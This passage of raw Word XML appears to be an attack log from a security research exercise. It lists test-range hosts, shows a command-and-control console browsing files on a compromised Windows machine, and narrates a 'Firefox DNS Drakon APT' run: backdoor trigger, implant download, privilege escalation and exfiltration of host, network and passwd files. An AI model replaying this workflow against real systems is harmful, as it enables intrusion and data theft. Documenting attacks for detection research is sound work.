        <w:t>128.55.12.59            ta3-starc-1-dp kafka-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002D93BA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.60            ta3-starc-2-dp kafka-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89043C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.61            ta3-starc-3-dp kafka-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76745E71" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.62            ta3-starc-4-dp kafka-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69580BCF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.63            ta3-starc-5-dp kafka-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CA00A7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.64            ta3-starc-6-dp kafka-6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D87FB8E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.56            ta1-fivedirections-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA5E37" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10.0.4.2                files.tc.bbn.com devel.tc.bbn.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D1F8D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.115           ta1-theia-replay-marple-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B002735" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.85            ta1-theia-database-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED04ED" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.112           ta1-theia-analysis-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E2EEDC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.110           ta1-theia-target-1-dp ta1-theia-target-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F24404" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.51            ta1-cadets-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67281BFA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.119           ta1-theia-target-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C62D73" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.111           ta1-theia-target-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA5045" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.113           ta1-theia-replay-adapt-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D764973" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.75            ta1-cadets-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC8736" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.106           ta1-cadets-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660BF290" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.126           ta1-trace-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365773E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.118           ta1-trace-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169C8C2C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.117           ta1-trace-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA3733" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.54            ta3-perf-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E45062" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.123           ta1-fivedirections-translate-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC8391" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.79            ta52-ubuntu-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517FFB7C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.57            ta3-perf-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DFAB86" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.78            ta52-ubuntu-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C40799" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.77            ta52-windows-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B646334" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.76            ta52-windows-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353EADF0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.66            ta1-marple-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3A72E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.124           ta1-marple-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61516521" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.67            ta1-marple-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA17F87" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.55            ta1-fivedirections-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A61E07" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                ta1-marple-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDAF764" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.55            ta1-fivedirections-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51931D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A85ACEF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>12:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154807CC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075FCEB7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0189FF67" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2617B962" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772FA975" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] lmhosts.sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A84F66F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EEEB65" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC97143" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740ADC92" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] tc-version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCC6F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68292022" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2999D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/05/2019 06:05 PM    &lt;DIR&gt;         .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208BC6AC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/05/2019 06:05 PM    &lt;DIR&gt;         ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D517586" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 04/24/2019 01:54 PM             2256 hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291662A2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 09/29/2017 01:44 PM             3683 lmhosts.sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD2A93B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/18/2017 09:01 PM              407 networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3281B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/18/2017 09:01 PM             1358 protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A166E53" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/18/2017 09:01 PM            17635 services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699329CF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 03/05/2019 06:04 PM               70 tc-version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB7EB3A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C7E1AB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>12:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46292F8B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cat networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511B9D8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] # Copyright (c) 1993-1999 Microsoft Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04135EDA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A7A54" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># This file contains network name/network number mappings for </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A3DE01" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># local networks. Network numbers are recognized in dotted decimal form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67889F02" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F48F6F9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># Format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37BA33" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEF0739" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># &lt;network name&gt;  &lt;network number&gt;     [aliases...]  [#&lt;comment&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F50799" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04315606" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t># For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BDC4B2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522FDA6C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#    loopback     127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB4185" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#    campus       284.122.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D4E74" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#    london       284.122.108</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A678863" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E82C69" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>loopback                 127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC87F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">           127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F8138C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F12CA63" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>12:56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEAFA5A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079325FE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1        128.55.12.109:49907 --&gt;   128.55.12.167:8640  [HTTP]  Fri May 17 12:48:04 2019        active 501s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332525D7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33297529" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[-] Connection lost for console [W1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD46A09" w14:textId="781D9075" w:rsidR="005A0BE6" w:rsidRPr="00650FDF" w:rsidRDefault="00650FDF" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Goodbye!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C3F894" w14:textId="7DB3493D" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="_Toc12600129"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>13:01 -- MARPLE 1 -- Firefox DNS Drakon APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w14:paraId="43242B5E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The attack started by browsing to http://128.55.12.167:8641/config.html, selecting DNS, entering hostname Xx--ls8h.com, file 938527054, and clicking the Visit button.  This triggered the Firefox backdoor to connect out via DNS to XX--ls8h.com.  Drakon APT was downloaded and executed and connected to 128.55.12.167:8640 for C2.  The attacker escalated privileges using the new File System Filter Driver, which looks for processes opening specific files which don’t exist and elevates them.  Once SYSTEM, the attacker exfil’ed the host and network files as well as a passwd file in the home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA09AAD" w14:textId="4397863B" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="_ni03h2v8qjxd" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="233" w:name="_Toc12600130"/>
      <w:bookmarkEnd w:id="232"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
    <w:p w14:paraId="755ABD67" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-marple-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.77</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Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35212176" w14:textId="1CC58791" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
